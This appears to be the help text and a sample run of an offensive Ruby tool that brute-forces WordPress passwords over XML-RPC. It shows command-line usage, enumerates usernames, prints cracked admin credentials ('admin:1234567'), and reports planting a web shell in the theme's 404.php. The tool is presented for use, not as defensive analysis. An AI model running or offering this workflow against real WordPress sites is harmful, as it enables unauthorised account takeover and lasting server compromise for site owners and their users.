WPiolt - Wordpress Bruteforce tool via XML-RPC. The basic version only provides limited functionalities.
Developer : Andy Yang Version : 0.1.0 License : GPLv3
================================================================================================ RainMak3r@Could:~/Desktop# ruby WPiolt.rb -h
./WPilot.rb -t 'www.target.com' -d '/User/eve/dic.txt'
./WPilot.rb -t '' -d '/User/eve/dic.txt'
-t, --Target URL/IP Wordpress target URL or IP
-d, --Dictionary path Dictionary file for password Bruteforce.
-h, --help Display help
================================================================================================ Example of usage.
RainMak3r@Could:~/Desktop#ruby WPilot.rb -t '' -d '/dic'
[Info] Checking if the target is vulnerable........
[Info] Target is vulnerable!!!
[Info] Retreving usernames........
[Info] Found username: admin
[Info] Found username: Alice
[Info] Found username: Bob
[Info] Bruteforcing passwords ........
[Info] Cracked Admin Creds: admin:1234567
[Info] Uploading shell into 404.php..........
[DONE] Please check a non existing post for the uploaded web shell